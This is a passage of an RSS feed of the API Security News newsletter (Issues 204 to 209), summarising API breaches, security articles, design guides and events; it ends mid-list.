<p>As part of my own research into open-source authorization and identity servers, I discovered the <a href="https://www.ory.sh/docs/open-source" target="_blank" rel="noopener noreferrer">Ory project</a>, which provides both an OAuth2/OIDC server (called Hydra) and an identity server (called Kratos). According to the <a href="https://github.com/ory/hydra" target="_blank" rel="noopener noreferrer">Hydra project page on GitHub</a>, Hydra is &#8220;<em>a hardened, OpenID Certified OAuth 2.0 Server and OpenID Connect Provider optimized for low-latency, high throughput, and low resource consumption&#8221;. </em>Hydra does not perform identity provision but can connect to your existing provider or use the Ory Kratos project.</p>
<p>The Ory project boasts a very wide adoption, including names such as RaspberryPi.org, Hootsuite.com, Arduino.cc, and Sainsburys.co.uk. The project is actively supported by a community of over 1000 contributors. Both Hydra and Kratos can easily be installed on a variety of operating systems or run using Docker. The documentation appears excellent at first glance, and there is a newsletter and plenty of quickstart videos and walkthroughs.</p>
<p>This looks to be an ideal project for any API developer looking to learn OAuth2/OIDC hands-on.</p>
<h2>Guide: Awesome BurpSuite extensions</h2>
<p>Related to my research around authorization and identity providers, I rediscovered the joys of using BurpSuite to examine API transactions.</p>
<p>In particular, when I needed to examine JWTs and OAuth2/OIDC requests, I stumbled upon this excellent guide for <a href="https://github.com/snoopysecurity/awesome-burp-extensions" target="_blank" rel="noopener noreferrer">awesome Burp extensions</a>, which will be invaluable to anyone using BurpSuite in anger.</p>
<p>Thanks to Sam Sanoop (<a href="https://twitter.com/snoopysecurity" target="_blank" rel="noopener noreferrer">@snoopysecurity</a>) for putting together this excellent list of resources. And of course to PortSwigger for BurpSuite.</p>
<h2>Event: &#8220;Are your APIs rugged?&#8221; — OWASP BeNeLux Days Conference 2022</h2>
<p>On Thursday next week (November 24th), I am going to be speaking at the <a href="https://www.owaspbenelux.eu/program/conference" target="_blank" rel="noopener noreferrer">OWASP BeNeLux Days conference</a> in Tilburg, Netherlands.</p>
<p>The topic is one of my favorites, &#8220;Are your APIs rugged?&#8221;, in which I will examine various strategies, tools, and techniques that developers can use to build more secure (and more rugged APIs). The talk will include a slight tongue-in-cheek view of what happens when your APIs aren&#8217;t rugged, featuring some of the major breaches covered in this newsletter.</p>
<p>Attendance is free, and at the time of writing, there were still tickets available — if you&#8217;re in the area, it would be great to see you; <a href="https://www.eventbrite.com/e/owasp-benelux-days-fall-2022-tickets-443386851007" target="_blank" rel="noopener noreferrer">grab a ticket now</a>.</p>
<p><a href="https://www.owaspbenelux.eu/program/conference" target="_blank" rel="noopener noreferrer"><img loading="lazy" decoding="async" class="alignnone wp-image-10212" src="https://apisecurity.io/wp-content/uploads/2022/11/Article5.png" alt="" width="601" height="248" /></a></p>
<p>The post <a href="https://apisecurity.io/issue-209-csrf-in-plesk-api-enabled-server-top-five-api-security-myths-ory-hydra-authentication-server/">Issue 209: CSRF in Plesk API-enabled server, top five API security myths, Ory Hydra authentication server</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 208: Urlscan.io leaks sensitive data, Dropbox phishing attack, contract test for microservices</title>
		<link>https://apisecurity.io/issue-208-urlscan-io-leaks-sensitive-data-dropbox-phishing-attack-contract-test-for-microservices/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 09 Nov 2022 19:44:11 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=10181</guid>

					<description><![CDATA[<p>This week, we have news of two API-related data breaches: the first in Urlscan.io API, which was found to be leaking sensitive URLs and data, and the second a phishing attack on Dropbox, where private GitHub repositories were copied. We also have an article on the importance of contract testing for microservices, and finally, another [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-208-urlscan-io-leaks-sensitive-data-dropbox-phishing-attack-contract-test-for-microservices/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-208-urlscan-io-leaks-sensitive-data-dropbox-phishing-attack-contract-test-for-microservices/">Issue 208: Urlscan.io leaks sensitive data, Dropbox phishing attack, contract test for microservices</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have news of two API-related data breaches: the first in Urlscan.io API, which was found to be leaking sensitive URLs and data, and the second a phishing attack on Dropbox, where private GitHub repositories were copied. We also have an article on the importance of contract testing for microservices, and finally, another contribution from Dana Epp on five mistakes that hackers make when attacking APIs.</p>
<h2>Breach: Urlscan.io leaking sensitive URLs and data</h2>
<p>First up is a report from PortSwigger on the recent <a href="https://portswigger.net/daily-swig/urlscan-io-api-unwittingly-leaks-sensitive-urls-data" target="_blank" rel="noopener noreferrer">vulnerability in the Urlscan.io website</a>, which unwittingly leaked URLs and other sensitive data, including emails. Urlscan.io is a popular tool in the industry for automated scans on websites to assess if they contain malicious content. The Urlscan.io service provides an API that allows users to scan websites automatically as part of a defense strategy, for example, on all incoming emails.</p>
<p>The alarm was raised by GitHub earlier this year, when they discovered that certain GitHub Pages URLs had been accidentally leaked. Last week, Positive Security <a href="https://positive.security/blog/urlscan-data-leaks" target="_blank" rel="noopener noreferrer">published a detailed blog</a> on how they believe the sensitive information was leaked. Most worrying was the sheer volume of leaked sensitive information, including password reset links, meeting invitations, setup pages, DocuSign requests, package tracking links&#8230; This probably was helped by the search feature on Urlscan.io which allowed an adversary to search for common links using &#8220;Google dorks&#8221; — for example, <a href="https://urlscan.io/search/#page.url%3Aapikey" target="_blank" rel="noopener noreferrer">this query</a> shows a large list of potential API keys in URLs.</p>
<p>The root cause was found to be a misconfigured API call within the API SDKs that Urlscan.io supplies (they call those <em>packs</em> in their terminology). When calling the Urlscan.io API, the calling client specifies the URL that is scanned and some other parameters, including the visibility of the scan results on the Urlscan.io platform — unfortunately, it appears that <code>public</code> was chosen as the default value. While not strictly speaking a vulnerability in the API, this certainly illustrates the importance of sensible and secure defaults.</p>
<p>Unfortunately, removing sensitive URLs was a manual process that had to be initiated with the Urlscan.io support team — it appears many large corporations, such as Apple, have had their URLs removed. If you believe your organization is affected, it might be a good idea to reach out to confirm.</p>
<h2>Breach: Dropbox phishing attack leaks 130 code repositories</h2>
<p>The second breach this week is the reported <a href="https://www.theregister.com/2022/11/01/dropbox_phishing_code_leak/" target="_blank" rel="noopener noreferrer">copying of 130 private GitHub repositories belonging to Dropbox in an apparent phishing attack</a>. The Register provide their customary tongue-in-cheek analysis of the breach, which resulted in leaking many secret API tokens and necessitated a rotation of all developer API credentials accessed in the incident.</p>
<p>The breach followed a fairly familiar pattern of attacking a site through a 3rd party connected service. Dropbox reportedly uses the popular CI/CD platform CircleCI for internal builds, which is integrated with their private GitHub code repositories. In this instance, an attacker sent phishing emails to Dropbox developers, which tricked them into visiting a spoofed CircleCI login page where they entered their credentials (including an OTP). Using the leaked credentials, the attacker could access the connected GitHub organization, including access to the private repositories.</p>
<p>Dropbox was oblivious to this activity, and the breach only came to light after GitHub&#8217;s security monitoring team alerted them of suspicious activity on their repositories. In fact, GitHub had only just <a href="https://github.blog/2022-09-21-security-alert-new-phishing-campaign-targets-github-users/" target="_blank" rel="noopener noreferrer">recently issued a security warning</a> about this attack using CircleCI as the lure. Full marks to GitHub for both their proactive and reactive response on this one.</p>
<p>Obviously Dropbox was less stellar in its security process — phishing is, unfortunately, an inevitability regardless of how much awareness training is offered; however, one would expect those fake CircleCI URLs to have been easily detected in an email filter. The more serious issue is the storage of API tokens in code repositories; at least in this case, there was a protocol to revoke the tokens. Remember to always use tokens with their scope and lifetime limited to the minimum necessary when connecting 3rd party services.</p>
<h2>Article: Contract testing for microservices</h2>
<p>This week, TechTarget featured an article on <a href="https://www.techtarget.com/searchapparchitecture/tip/Why-contract-testing-can-be-essential-for-microservices" target="_blank" rel="noopener noreferrer">the importance of contract testing for microservices</a> which is worth reading for anyone embracing a design-first approach to API design.</p>
<p>The author highlights some common challenges facing integrators and test teams building large-scale microservice-based systems, such as:</p>
<ul>
<li><strong>Too many integrations to test</strong>: As microservices continue to grow (enabled by APIs), it becomes increasingly difficult to test individual microservices and testers become reliant on testing the end-to-end system, making it hard to identify points of failure.</li>
<li><strong>Mismatched microservice versions</strong>: As microservices are updated more frequently, it becomes difficult to manage their versions, meaning that often tests are being run against newer versions of an API which can result in a fragile system.</li>
<li><strong>Lack of clear testing requirements</strong>: Unless a tester is precisely clear about the expected behavior of a service, it is difficult to determine a pass or fail condition.</li>
</ul>
<p>Contract testing offers several key benefits:</p>
<ul>
<li><strong>Scale</strong>: Individual services can be tested locally at the point of development, without waiting for a complete end-to-end deployment.</li>
<li><strong>Manageable tests</strong>: If only two microservices change, it is not necessary to test the entire system; rather, the affected services can be tested in isolation against their contract.</li>
<li><strong>Scope</strong>: The contract defines precisely the expected behavior, removing doubt in the tester&#8217;s mind about the scope of what to test.</li>
</ul>
<p>One obvious downside is the reliance on a contract to begin with. My opinion is that the time invested in getting the contract correct up-front is time well spent from several perspectives — testing, documentation, and security.</p>
<h2>Article: Five mistakes beginners make attacking APIs</h2>
<p>This week, <a href="https://danaepp.com/5-big-mistakes-beginners-make-hacking-apis" target="_blank" rel="noopener noreferrer">we have another great article</a> on API security from Dana Epp where he takes a look at the top five mistakes that beginners make when attacking APIs.</p>
<p>One of the challenges facing a technology writer is to convey their depth of knowledge into a single blog post, but this particular article absolutely nails it. If you&#8217;re starting out with hacking or attacking APIs, I cannot recommend this highly enough.</p>
<p>To whet the appetite, here&#8217;s Dana&#8217;s top five rookie mistakes that attackers make:</p>
<ul>
<li>They don’t do enough reconnaissance.</li>
<li>They don’t discover API documentation.</li>
<li>They don’t use disposable IP addresses.</li>
<li>They don’t log and document enough.</li>
<li>They give up too early.</li>
</ul>
<p>Another great article from Dana — two more to go and he gets a free coffee on the house <img src="https://s.w.org/images/core/emoji/16.0.1/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-10199" src="https://apisecurity.io/wp-content/uploads/2022/11/Article4.jpg" alt="" width="617" height="426" /></p>
<p>The post <a href="https://apisecurity.io/issue-208-urlscan-io-leaks-sensitive-data-dropbox-phishing-attack-contract-test-for-microservices/">Issue 208: Urlscan.io leaks sensitive data, Dropbox phishing attack, contract test for microservices</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 207: Tinder API gateway, runtime secrets protection for mobile APIs, and Open Banking APIs</title>
		<link>https://apisecurity.io/issue-207-tinder-api-gateway-runtime-secrets-protection-for-mobile-apis-and-open-banking-apis/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 02 Nov 2022 19:25:57 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=10159</guid>

					<description><![CDATA[<p>This week, we take a deep dive into the Tinder API gateway and how it solves security challenges. We also have an article from Approov on how to protect runtime secrets for mobile APIs, and an article on Open Banking API security best practices. Finally, we look at how software bill of materials (SBOMs) can [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-207-tinder-api-gateway-runtime-secrets-protection-for-mobile-apis-and-open-banking-apis/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-207-tinder-api-gateway-runtime-secrets-protection-for-mobile-apis-and-open-banking-apis/">Issue 207: Tinder API gateway, runtime secrets protection for mobile APIs, and Open Banking APIs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we take a deep dive into the Tinder API gateway and how it solves security challenges. We also have an article from Approov on how to protect runtime secrets for mobile APIs, and an article on Open Banking API security best practices. Finally, we look at how software bill of materials (SBOMs) can aid API attacks.</p>
<h2>Article: Deep dive into the Tinder API gateway</h2>
<p>API gateways are a pillar of API security, especially in enforcing transport security and rate limiting. <a href="https://medium.com/tinder/how-we-built-the-tinder-api-gateway-831c6ca5ceca" target="_blank" rel="noopener noreferrer">I was interested to read</a> the unusual approach taken by Tinder (yes, <em>that</em> Tinder), who took the unusual step of building their own API gateway solution: Tinder API Gateway (TAG). Their main justification for this decision was the inability to scale their current environment of over 500 microservices and several different API gateways across application teams. This led to complexity (resulting in a scaling problem), maintenance challenges, and inconsistent enforcement of gateway policy.</p>
<p>The core design concept behind TAG was <em>configuration-driven development,</em> whereby development teams could define their routing requirements in TAG-specific notation and, upon deployment, were automatically configured by TAG. There were also several other important considerations, many relating to API security, such as:</p>
<ul>
<li>Request and response scanning</li>
<li>Schema registry for auto-generation of API documentation</li>
<li>Detecting vulnerabilities, like bot attacks, and real-time traffic detection</li>
<li>API standardization and auditing process</li>
<li>Consistent and uniform session management</li>
</ul>
<p>The article makes very specific references to the security challenges that Tinder faces: they have users in over 190 countries and handle high volumes of API traffic, some genuine but significant volumes from bad actors, too. Using a central API gateway allows them to block malicious traffic at the first point of ingress rather than exposing internal services to such traffic.</p>
<p>The basic TAG architecture is shown below:</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-10164" src="https://apisecurity.io/wp-content/uploads/2022/11/Article1.jpg" alt="" width="608" height="298" /></p>
<p>To understand some of the unique features of TAG, it is instructive to look at how it processes an inbound request:</p>
<ul>
<li>TAG performs a reverse geolocation IP lookup (RGIL) to determine the country code and then to perform rate limiting or request banning.</li>
<li>TAG scans both the request and response to check the semantics, and then streams data internally to other services, such as bot detection.</li>
<li>TAG manages sessions through global filters.</li>
<li>TAG pre-filters the request to remove any unwanted or unexpected data from the request before it is processed by internal services.</li>
<li>TAG post-filters the response using predefined filters to remove any extraneous or unexpected data, like filtering of error logs.</li>
</ul>
<p>While not every organization faces the unique scale of security challenges like Tinder, this article gives a fascinating insight into solving this problem at scale. I&#8217;m certainly looking forward to their next blog.</p>
<h2>Article: Runtime secrets protection for mobile APIs</h2>
<p>We have <a href="https://apisecurity.io/issue-155-vulnerability-brewdog-mobile-app-apiclarity-kubecon-api-attacks-open-banking/" target="_blank" rel="noopener noreferrer">previously covered</a> API vulnerabilities in mobile applications where attackers were able to retrieve API keys or application secrets from a mobile application using simple reverse-engineering methods. This week <a href="https://securityboulevard.com/2022/07/hands-on-mobile-app-and-api-security-runtime-secrets-protection/" target="_blank" rel="noopener noreferrer">we feature an in-depth guide</a> from Approov on how to fully protect API keys and runtime secrets.</p>
<p>Many developers embed their API keys within the application binary without realizing how easily they can be extracted from it, either using binary static analysis or through extraction &#8220;on the wire&#8221; with a machine-in-the-middle attack (MitM).</p>
<p>The article provides a great write-up on how the Approov mobile protection can be used to protect the integrity of the mobile application (referred to as <em>mobile app attestation</em>) and to provide a secure delivery channel for secrets. An interesting read that highlights a challenge developers commonly encounter.</p>
<h2>Article: Open Banking API security best practices</h2>
<p>Next is an article from HelpNetSecurity on <a href="https://www.helpnetsecurity.com/2022/10/20/open-banking-api-security-best-practices/" target="_blank" rel="noopener noreferrer">best practices for API security in Open Banking</a>. While more than 90% of banks are now offering open banking services to drive innovation and personalized banking services, nearly one in two customers have security concerns about open banking.</p>
<p>The article makes the following recommendations, covered here in brief:</p>
<ul>
<li>Go beyond your traditional methods and best practices for APIs — consider using self-learning AI, behavioral analysis, security analytics, automation&#8230;</li>
<li>Embrace a <em>secure-by-design</em> philosophy — assume the worst and design for that.</li>
<li>Actively discover APIs and track your inventory — you can&#8217;t secure what you can&#8217;t see.</li>
<li>Adopt a risk-based approach to security — understand what matters and protect that.</li>
<li>Implement zero-trust policies.</li>
<li>Identify and remediate vulnerabilities, gaps, and misconfiguration — continuously reduce your attack surface.</li>
<li>Stop API attacks in real time.</li>
</ul>
<p>There aren&#8217;t any great surprises in this list for readers of this newsletter, but they are worth reinforcing, regardless of your industry sector.</p>
<h2>Article: Can SBOMs help API attacks?</h2>
<p>Finally, <a href="https://danaepp.com/can-sbom-help-you-attack-apis" target="_blank" rel="noopener noreferrer">another great article from Dana Epp</a>, this time covering the topic of software bill of materials (SBOMs) and whether they can aid API attackers.</p>
<p>SBOMs have become a hot topic in the software security industry following the <a href="https://www.whitehouse.gov/briefing-room/presidential-actions/2021/05/12/executive-order-on-improving-the-nations-cybersecurity/" target="_blank" rel="noopener noreferrer">Executive Order on Improving the Nation’s Cybersecurity</a> that President Biden issued in May 2021. For readers unfamiliar with SBOMs, think of them as a list of ingredients for an application: typically they include the dependencies (libraries and components) that your application uses. Intuitively, having an up-to-date SBOM allows an organization to immediately assess the risk an application might pose based on the risk of the constituent components.</p>
<p>However, there is a downside to having an SBOM that may become available to adversaries: it is a simple matter to map an SBOM into a corresponding vulnerability database (describing the nature of the vulnerability) or — even worse — into a vulnerability exploit database (describing how attacks can be launched against know vulnerabilities). A skilled API attacker could map all vulnerabilities in a given API and then construct attacks that specifically target those vulnerabilities.</p>
<p>In my opinion, I would rather know about the vulnerabilities in my application and actively remediate them, rather than try to keep them hidden, in the vain hope that attackers do not find them.</p>
<h2>Event: Defending APIs with Jim Manico</h2>
<p><strong>Episode 1: <a href="https://42crunch.com/defending-apis-with-jim-manico-episode-1/" target="_blank" rel="noopener noreferrer">Request Forgery on the Web &#8211; CSRF &amp; SSRF</a></strong></p>
<p>In the first of two episodes, Jim Manico, CEO of Manicode, and Colin Domoney from 42Crunch discuss request forgery and how to prevent it. This technical talk is intended for software developers who needs to build secure web applications and APIs. It covers the two variants of request forgery: client side (CSRF) and server side (SSRF).</p>
<ul>
<li>CSRF is most widely associated with vulnerable web applications that trick a user in a client browser into submitting transactions they never intended to use in their current authenticated session. We discuss historical CSRF attacks and investigate various well-proven defense strategies. For API developers, we investigate whether APIs are vulnerable to CSRF, and how to prevent it.</li>
<li>SSRF attacks allow a malicious client to trick a vulnerable server into submitting requests to an unintended location, typically by submitting malformed URLs in payloads and relying on vulnerabilities in the URL parsing code. We discuss prevention strategies and examine some well-known examples. For API developers, we investigate ways in which SSRF can be directed at vulnerable APIs and examine a few recent API breaches and the latest research.</li>
</ul>
<p><a href="https://42crunch.com/defending-apis-with-jim-manico-episode-1/" target="_blank" rel="noopener noreferrer"><img loading="lazy" decoding="async" class="alignnone wp-image-10150" src="https://apisecurity.io/wp-content/uploads/2022/10/Article5-1.jpg" alt="" width="617" height="197" /></a></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>The post <a href="https://apisecurity.io/issue-207-tinder-api-gateway-runtime-secrets-protection-for-mobile-apis-and-open-banking-apis/">Issue 207: Tinder API gateway, runtime secrets protection for mobile APIs, and Open Banking APIs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 205: Manufacturing industry seeing more API incidents than other industries, two guides on developing secure APIs</title>
		<link>https://apisecurity.io/issue-205-manufacturing-industry-seeing-more-api-incidents-than-other-industries-two-guides-on-developing-secure-apis/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 20 Oct 2022 16:12:04 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=10128</guid>

					<description><![CDATA[<p>This week, we have a report revealing that the manufacturing industry experiences more API-related incidents than other industries. To follow, we have two guides for developers: the first describes the REST protocol and common API vulnerabilities, and the second prescribes best practices for secure API design. Finally, we have a fun read on cracking API [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-205-manufacturing-industry-seeing-more-api-incidents-than-other-industries-two-guides-on-developing-secure-apis/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-205-manufacturing-industry-seeing-more-api-incidents-than-other-industries-two-guides-on-developing-secure-apis/">Issue 205: Manufacturing industry seeing more API incidents than other industries, two guides on developing secure APIs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have a report revealing that the manufacturing industry experiences more API-related incidents than other industries. To follow, we have two guides for developers: the first describes the REST protocol and common API vulnerabilities, and the second prescribes best practices for secure API design. Finally, we have a fun read on cracking API tokens with Azure compute resources.</p>
<h2>Article: Manufacturing industry seeing more API incidents than other industries</h2>
<p>A <a href="https://www.smartindustry.com/benefits-of-transformation/cybersecurity/blog/21436141/why-the-manufacturing-sector-reports-more-api-security-incidents-than-other-industries" target="_blank" rel="noopener noreferrer">recent report</a> surveying 600 UK and USA CISOs and cybersecurity professionals reveals that the manufacturing industry experiences more API security incidents than other industries. The headline figures make for some eye-opening reading — on average, enterprise organizations have over 15 000 APIs, and on average, the respondents indicated that three-quarters of them had experienced an API-related incident.</p>
<p>The report surveyed six industry sectors: financial services, retail and eCommerce, healthcare, government and public sector, manufacturing, and energy and utilities. Of these, manufacturing had the highest occurrence of API incidents (79%), was the least likely to deploy an API security platform (less than 30%), and conducted the least frequent API security testing.</p>
<p>Intuitively, it stands to reason that manufacturing would be a laggard: they operate in a very heterogeneous environment, with many disparate and legacy systems, and due to economic pressures to run 24/,7 there may not be an opportunity to test or upgrade systems.</p>
<p>The report highlights a common concern in the industry: incomplete API inventory. Over three-quarters of respondents in the manufacturing industry revealed that they do not have an accurate idea of their current API inventory. This fact alone exposes them to significant and unquantifiable risks.</p>
<h2>Guide: REST API security vulnerabilities deep dive</h2>
<p>Next up is <a href="https://javascript.plainenglish.io/rest-api-overview-api-security-vulnerabilities-a677cda0be9d" target="_blank" rel="noopener noreferrer">the first of two guides on developing secure APIs</a> we have this week. In this one, Santosh Shinde (<a href="https://twitter.com/shindesan2012" target="_blank" rel="noopener noreferrer">@shindesan2012</a>) describes the REST protocol in some depth and then takes a deep dive into the OWASP API Security Top 10 vulnerabilities.</p>
<p>The guide is written from a developer&#8217;s perspective, rather than an attacker&#8217;s. I liked how the author presented each vulnerability and explained the root cause and how to handle them in code. For example, the description of BOLA is shown below:</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-10137" src="https://apisecurity.io/wp-content/uploads/2022/10/Article2-1.jpg" alt="" width="602" height="447" /></p>
<p>Thanks to Santosh for contributing this guide which will, I&#8217;m sure, be useful to developers getting their first exposure to the world of API security.</p>
<h2>Guide: Best practices for secure API design</h2>
<p>Picking up where the first one left off, in our second guide by Pedro Aravena (<a href="https://mobile.twitter.com/OPedroAravena" target="_blank" rel="noopener noreferrer">@OPedroAravena</a>) gives a <a href="https://dev.to/vaultree/designing-a-secure-api-4059" target="_blank" rel="noopener noreferrer">fantastic ten-step guide to building secure APIs</a>, starting with design and ending with, of course, API security.</p>
<p>I loved this guide — it&#8217;s clearly written by someone with a wealth of experience on the topic. This guide will be most valuable to API architects or system designers, but there is something for everyone in here, from API versioning, to clean architecture and pagination.</p>
<p>Thanks to Pedro for this great guide.</p>
<h2>Article: Using Azure to crack API tokens</h2>
<p>Finally this week, we have <a href="https://danaepp.com/how-to-use-azure-to-crack-api-auth-tokens" target="_blank" rel="noopener noreferrer">an entertaining read</a> from Dan Epp (<a href="https://twitter.com/DanaEpp" target="_blank" rel="noopener noreferrer"><span class="css-901oao css-16my406 r-poiln3 r-bcqeeo r-qvutc0">@DanaEpp</span>)</a> on the feasibility of cracking API tokens with Azure compute resources.</p>
<p>Epp attempts to crack the JWT signing key captured during a session with the vulnerable API application crAPI,  and uses the popular <em>hashcat</em> tool to brute force the JWT on a standard desktop. Given the strength of the algorithms used and a key of any reasonable length, its likely that a successful attack could take decades — obviously, this is totally impractical.</p>
<p>However, Epp happens to be a Microsoft Security MVP, so has the good fortune to have access to Azure resources. He describes how to use an Azure VM with a suitable GPU, such as the NCv3-series virtual machine which gives the optimal cost/performance ratio for cloud cracking. To demonstrate, Epp cracked the signing key for crAPI in under a minute at an estimated cost of $1 — however, this was only a 5-character key.</p>
<p>Obviously, in the real world, it is unlikely (although not impossible) to find such short signing keys. Epp gives the following estimates for longer keys:</p>
<ul>
<li>6 chars: ~14 min</li>
<li>7 chars: ~1 day</li>
<li>8 chars: ~100 days</li>
<li>9 chars: ~23 years</li>
</ul>
<p>As ever, the standard recommendation applies: use the largest possible key and the strongest algorithm.</p>
<h2>Event: Defending APIs with Jim Manico</h2>
<p>Join Jim Manico, CEO of Manicode, and Colin Domoney from 42Crunch, as they deliver a 2-part webinar series to help developers better defend APIs.</p>
<p><strong>Episode 1: <a href="https://42crunch.com/defending-apis-with-jim-manico-episode-1/" target="_blank" rel="noopener noreferrer">Request Forgery on the web &#8211; SSRF, CSRF &amp; Clickjacking</a></strong></p>
<p>In this first episode, Jim and Colin will discuss request forgery and how to prevent it. This technical talk is intended for the software developer who needs to build secure web applications and APIs. It will cover three main topics: CSRF, SSRF, and clickjacking.</p>
<p><a href="https://42crunch.com/defending-apis-with-jim-manico-episode-1/" target="_blank" rel="noopener noreferrer"><img loading="lazy" decoding="async" class="alignnone wp-image-10150" src="https://apisecurity.io/wp-content/uploads/2022/10/Article5-1.jpg" alt="" width="617" height="197" /></a></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>The post <a href="https://apisecurity.io/issue-205-manufacturing-industry-seeing-more-api-incidents-than-other-industries-two-guides-on-developing-secure-apis/">Issue 205: Manufacturing industry seeing more API incidents than other industries, two guides on developing secure APIs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 204: API attacks on shadow APIs, PII leaks from e-commerce APIs, API runtime security</title>
		<link>https://apisecurity.io/issue-204-api-attacks-on-shadow-apis-pii-leaks-from-e-commerce-apis-api-runtime-security/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Fri, 14 Oct 2022 16:19:44 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=10095</guid>

					<description><![CDATA[<p>This week, we have articles on the rise of API attacks that target shadow APIs, how API attacks on on e-commerce sites leak PII, views from Trendmicro on the importance of API runtime security, and a guide on API penetration testing. Article: API attacks target shadow APIs First up this week is a report from [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-204-api-attacks-on-shadow-apis-pii-leaks-from-e-commerce-apis-api-runtime-security/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-204-api-attacks-on-shadow-apis-pii-leaks-from-e-commerce-apis-api-runtime-security/">Issue 204: API attacks on shadow APIs, PII leaks from e-commerce APIs, API runtime security</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have articles on the rise of API attacks that target shadow APIs, how API attacks on on e-commerce sites leak PII, views from Trendmicro on the importance of API runtime security, and a guide on API penetration testing.</p>
<h2>Article: API attacks target shadow APIs</h2>
<p>First up this week is <a href="https://www.darkreading.com/attacks-breaches/more-than-30-of-all-malicious-attacks-target-shadow-apis" target="_blank" rel="noopener noreferrer">a report from DarkReading on recent research</a> showing that approximately 5 billion (31%) malicious transactions targeted shadow APIs (unknown, unmanaged, and — most importantly — unprotected APIs).</p>
<p>The report ranks the top three threats to APIs, based on monitoring 20 billion API transactions in the first half of 2022:</p>
<ul>
<li>The top threat to APIs was epitomized by the 5 billion malicious requests observed targeted shadow APIs. These attacks varied greatly in nature: from highly volumetric bots trying to scrape sites for deals, to fraud using stolen credit card, to simple credential stuffing attacks.</li>
<li>The next most prominent threat was API abuse, based on the 3.6 billion attacks blocked by the threat research team. API abuse is generally defined as attacks against properly coded and inventoried APIs, that is, APIs which are not typically considered vulnerable as per the OWASP API Security Top 10 list. The most common attack vector associated with abuse cases is the redemption of gift cards or the creation of fake accounts on dating and shopping applications.</li>
<li>The third most prominent threat was a combination of three common API threats: credential stuffing, shadow APIs, and sensitive data exposure. By using these three vulnerabilities in combination, attackers could mount sophisticated attacks to exfiltrate data from APIs.</li>
</ul>
<p>The report also highlighted the rise in account takeover (ATO) attacks. The researchers recorded 1.17 billion malicious login attacks against API endpoints. Also highlighted is the significant cost associated with a successful account takeover attack — in this case, approximately $193 million.</p>
<p>This an interesting report indicating the importance of both strengthening your APIs by secure design and coding, while also protecting them against abuse.</p>
<h2>Article: PII leaking from e-commerce APIs</h2>
<p>We frequently feature API security news from the financial services sector. By way of a change, this week, we have a great article from Trend Micro on <a href="https://www.trendmicro.com/vinfo/us/security/news/online-privacy/pii-leaks-and-other-risks-from-unsecure-e-commerce-apis" target="_blank" rel="noopener noreferrer">the challenges to the e-commerce sector posed by unsecured APIs</a>.</p>
<p>The report specifically draws attention to PII leaked through APIs, such as name, email, address, purchase history, and other shopping preferences. The report also highlights that this particular combination of sensitive information could allow attackers to launch very sophisticated fraud campaigns targeting consumers based on their preferences. Best lies have some truth mixed in them: it would be harder for the victims to spot these attacks as including correct details lends the air of validity to the ruse, making this highly attractive to attackers.</p>
<p>The report covers two specific scenarios for e-commerce providers, third-party logistics (3PL) and fourth-party logistics (4PL), as shown below:</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-10107" src="https://apisecurity.io/wp-content/uploads/2022/10/Article2.jpg" alt="" width="501" height="693" /></p>
<p>In the case of 3PL, the merchant uses a 3PL provider to handle the logistics of shipping the product from the merchant to the customer. In 4PL, the 4PL provider handles the entire supply chain. To create these sophisticated supply chains, the merchant must pass shipping and order information downstream to the logistics provider. Unfortunately, as the report reveals, this is often done in an insecure fashion, which can lead to leaked PII.</p>
<p>The report identifies several vulnerabilities that are common to supply chain API implementations, such as:</p>
<ul>
<li>Passing customer information in URLs as query parameters</li>
<li>Allowing unauthenticated (guest) users to check other users&#8217; order status using a unique URL</li>
<li>Using session cookies that do not expire</li>
</ul>
<p>All these can allow attackers to glean information on other users that can then be used for nefarious purposes.</p>
<p>To improve the security posture of e-commerce APIs, the report makes the following recommendations:</p>
<ul>
